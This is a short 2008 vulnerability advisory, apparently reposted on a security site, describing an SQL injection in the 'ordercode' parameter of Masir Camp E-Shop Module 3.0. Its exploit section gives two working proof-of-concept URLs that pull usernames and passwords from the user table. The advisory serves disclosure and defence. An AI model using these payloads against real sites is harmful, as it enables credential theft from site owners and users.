Masir Camp E-Shop Module <= 3.0 (ordercode) SQL Injection Vuln

2008.09.12
Credit: BugReport
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

########################## www.BugReport.ir ####################################### # # AmnPardaz Security Research Team # # Title: Masir Camp E-Shop Module <= 3.0 SQL Injection # Vendor: www.masir.net # Vulnerable Version: 3.0 and prior versions # Exploit: Available # Impact: Medium # Fix: N/A # Original Advisory: http://bugreport.ir/index_52.htm ################################################################################### #################### 1. Description: #################### Masir Camp is an advanced website management and content management software. It is suitable for management, control and information presentation. "Masir Camp" increases your ability to manage and control your website or weblog.It use Microsoft .Net and MS-SQL. But you have no limitation to use other DBMSs. #################### 2. Vulnerabilities: #################### 2.1. Injection Flaws. SQL Injection in "veiworderstatus" in "ordercode" parameter. #################### 3. Exploits/POCs: #################### http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 UserName from UserInfoView)-- http://[URL]/?page=veiworderstatus&ordercode=foo' or 1=(select top 1 Password from UserInfoView)-- #################### 4. Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### 5. Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top